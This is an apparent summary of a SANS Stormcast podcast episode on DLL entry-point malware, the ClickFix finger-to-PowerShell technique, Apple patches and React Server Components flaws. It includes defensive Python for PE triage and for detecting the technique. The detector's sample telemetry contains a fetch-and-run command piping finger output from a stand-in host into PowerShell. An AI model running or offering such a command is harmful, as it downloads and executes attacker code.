
New Stormcast Episode Highlights Key Cybersecurity Topics
In this edition of Stormcast from Monday, December 15, 2025, Johannes Ullrich, broadcasting from Jacksonville, Florida, covers several key topics in cybersecurity, ranging from malware analysis to recently discovered critical vulnerabilities. The podcast highlights sophisticated attack techniques, best practices for security professionals, and essential updates for operating systems.
The first topic discussed is the analysis of Dynamic Link Libraries (DLLs) on Windows, an often-overlooked element in the study of malicious software. Xavier, a regular contributor, explains that DLLs, used to extend program functionalities, can contain an entry point – a function automatically executed upon loading the library. This mechanism is particularly relevant for malware analysts, as a DLL can be loaded without its functions being explicitly called. If no function is used, malicious activity could be hidden in this entry point, executed in the background. This technique underscores the importance of examining all aspects of a file, even those that seem innocuous, to detect suspicious behaviors.
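To make the analyst's point concrete, the following added example (not code from the podcast or from the ISC diary it summarises) parses just enough of a PE header to answer the question Xavier raises: does this DLL have an entry point that will run on load, and does it export anything at all? It uses only the standard library and constructs its own minimal PE32+ header bytes as sample input, so the `build_minimal_pe` helper, the triage codes and the sample images are all constructed for this illustration and are not real samples.

```python
import struct

# Fields from the PE/COFF specification that the triage relies on.
IMAGE_FILE_DLL = 0x2000              # Characteristics flag: the image is a DLL
IMAGE_FILE_EXECUTABLE_IMAGE = 0x0002
PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def inspect_pe(data: bytes) -> dict:
    """Read the headers only: DLL flag, AddressOfEntryPoint and export-directory presence."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    (_machine, _nsect, _stamp, _symtab, _nsyms, _opt_size,
     characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20                                   # optional header follows the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    (entry_rva,) = struct.unpack_from("<I", data, opt + 16)   # AddressOfEntryPoint (same offset in PE32/PE32+)
    if magic == PE32PLUS_MAGIC:
        count_off, dirs_off = 108, 112                # NumberOfRvaAndSizes, first data directory
    elif magic == PE32_MAGIC:
        count_off, dirs_off = 92, 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    (num_dirs,) = struct.unpack_from("<I", data, opt + count_off)
    export_rva = export_size = 0
    if num_dirs >= 1:                                 # data directory index 0 is the export table
        export_rva, export_size = struct.unpack_from("<II", data, opt + dirs_off)
    return {
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "entry_point_rva": entry_rva,                 # 0 means nothing runs on load
        "has_exports": export_rva != 0 and export_size != 0,
    }


# Triage codes (constructed for this example) and what an analyst should do with each.
EXPLANATIONS = {
    "not_a_dll": "executable image, normal entry-point review applies",
    "dll_no_entry": "DLL with no entry point: no code runs on load, only exports matter",
    "dll_entry_only": "DLL with an entry point and no exports: loading alone executes it, review the entry point first",
    "dll_entry_and_exports": "DLL with entry point and exports: review the entry point in addition to the exports",
}


def triage(info: dict) -> str:
    if not info["is_dll"]:
        return "not_a_dll"
    if info["entry_point_rva"] == 0:
        return "dll_no_entry"
    return "dll_entry_only" if not info["has_exports"] else "dll_entry_and_exports"


def build_minimal_pe(*, is_dll: bool, entry_rva: int, export_rva: int = 0, export_size: int = 0) -> bytes:
    """Constructed sample input: a header-only PE32+ image, not a loadable file."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))       # e_lfanew points right after the DOS header
    opt = bytearray(112 + 16 * 8)                     # PE32+ fixed fields plus 16 data directories
    struct.pack_into("<H", opt, 0, PE32PLUS_MAGIC)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 108, 16)
    struct.pack_into("<II", opt, 112, export_rva, export_size)
    characteristics = IMAGE_FILE_EXECUTABLE_IMAGE | (IMAGE_FILE_DLL if is_dll else 0)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, len(opt), characteristics)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    samples = {
        "silent_loader.dll": build_minimal_pe(is_dll=True, entry_rva=0x1000),
        "plugin.dll": build_minimal_pe(is_dll=True, entry_rva=0x1000, export_rva=0x3000, export_size=0x80),
        "resource_only.dll": build_minimal_pe(is_dll=True, entry_rva=0),
    }
    for name, image in samples.items():
        code = triage(inspect_pe(image))
        print(f"{name}: {code} -> {EXPLANATIONS[code]}")
```

On a real file, read the bytes with `open(path, "rb").read()` and pass them to `inspect_pe`; the "dll_entry_only" verdict is the case the episode warns about, where nothing in the export table explains the file's behaviour because all of it sits behind the entry point.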
Next, Brad discusses a recent attack campaign named ClickFix, which exploits a clever social engineering method. Attackers trick victims into copying and pasting PowerShell commands into their terminal, often via a fake CAPTCHA. One trick used to mask malicious intent is the use of the finger command, an old and rarely used protocol that retrieves ASCII data via a TCP connection on port 79. In this case, the finger command is used to download a malicious PowerShell script, which is then automatically executed. This technique illustrates how obsolete tools can be repurposed to bypass modern defenses. For network administrators, this highlights the importance of blocking unnecessary outgoing ports, such as 79, 445 (SMB), or other rarely used ports, to limit potential attack vectors.
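The following added example (written for this summary, not code from the podcast or from Brad's diary) turns the two defensive takeaways of this segment into checks that run over endpoint telemetry: it flags outbound connections to ports the episode suggests blocking (79 for finger, 445 for SMB), any execution of `finger.exe`, and a command line that pipes finger output into a script interpreter. The events are constructed, Sysmon-style records (process creation and network connection), and the field names, hostnames and addresses are assumptions for the illustration.

```python
import ntpath
import re

# Outbound ports the episode recommends blocking; a site would extend this from its own egress policy.
BLOCKED_EGRESS_PORTS = {79, 445}

# finger (or finger.exe) whose output is piped into PowerShell or cmd on the same command line.
PIPE_TO_INTERPRETER = re.compile(r"finger(\.exe)?\b[^|]*\|\s*(powershell|pwsh|cmd)", re.IGNORECASE)

# Constructed sample telemetry (not real logs): a ClickFix-style chain followed by benign activity.
SAMPLE_EVENTS = [
    {"event": "process", "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "finger.exe lookup@finger.example.invalid | powershell -"'},
    {"event": "process", "image": r"C:\Windows\System32\finger.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "finger.exe lookup@finger.example.invalid"},
    {"event": "network", "image": r"C:\Windows\System32\finger.exe", "dst_ip": "203.0.113.10",
     "dst_port": 79, "initiated": True},
    {"event": "process", "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"event": "network", "image": r"C:\Program Files\Browser\browser.exe", "dst_ip": "198.51.100.5",
     "dst_port": 443, "initiated": True},
]


def detect(events):
    """Return (rule, image, detail) tuples for events matching the finger/egress rules."""
    alerts = []
    for ev in events:
        image = ntpath.basename(ev.get("image", "")).lower()
        if ev["event"] == "network":
            # Only connections the host initiated matter for an egress policy check.
            if ev.get("initiated") and ev.get("dst_port") in BLOCKED_EGRESS_PORTS:
                alerts.append(("egress_to_blocked_port", image, ev["dst_port"]))
        elif ev["event"] == "process":
            cmd = ev.get("cmdline", "")
            if PIPE_TO_INTERPRETER.search(cmd):
                alerts.append(("finger_output_piped_to_interpreter", image, cmd))
            elif image == "finger.exe":
                # finger has almost no legitimate use on a modern workstation, so any run is worth a look.
                alerts.append(("finger_execution", image, cmd))
    return alerts


def egress_allowed(port: int) -> bool:
    """Policy helper: True if an outbound connection to this port would be permitted."""
    return port not in BLOCKED_EGRESS_PORTS


if __name__ == "__main__":
    for rule, image, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {image}: {detail}")
```

The pipe rule catches the chain at the point the episode describes, where the retrieved text is handed straight to an interpreter; the egress rule is the network-side backstop, and if port 79 is actually blocked at the perimeter the connection attempt still shows up as a failed outbound connection to investigate.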
Another notable point in this edition is the urgent update published by Apple for all its operating systems, fixing no less than 48 vulnerabilities. Among these, two critical flaws in WebKit – the rendering engine used by Safari and other applications – have particularly caught attention. These vulnerabilities, already exploited in targeted attacks before the release of patches, potentially allow the execution of arbitrary code. Although the attacks remain limited and no public exploit is known, Johannes Ullrich recommends applying these updates as soon as possible, without panicking. He also reminds us that patches released on a Friday can go unnoticed, emphasizing the importance of proactive monitoring. Additionally, Apple fixed a flaw in Compressor, a video compression utility that, when active, listens to local network traffic and can execute arbitrary code upon receiving malicious data. Although this software is not constantly running, this vulnerability reminds us that even specialized tools can become targets if not updated.
Finally, the podcast discusses recent vulnerabilities in React Server Components, a popular framework for web application development. Three flaws have been identified: two causing denial of service (DoS) and a third, although less critical in terms of CVSS score, potentially allowing source code leakage. This latter flaw manifests when user-submitted data is "stringified" (converted to a string), which can accidentally include code fragments in HTTP responses. Applications vulnerable to the React to Shell flaw (a previous vulnerability in the same framework) are likely also exposed to these new issues. For developers, this underscores the importance of carefully validating and sanitizing user inputs, as well as following best security practices for modern frameworks.
In conclusion, this edition of Stormcast provides a comprehensive overview of current threats and best practices to adopt. Whether for malware analysts, network administrators, or developers, the shared information helps better understand risks and adopt appropriate preventive measures. Johannes Ullrich also announces that the release of future episodes might be brought forward due to his teaching schedule in Europe, inviting listeners to stay tuned for updates.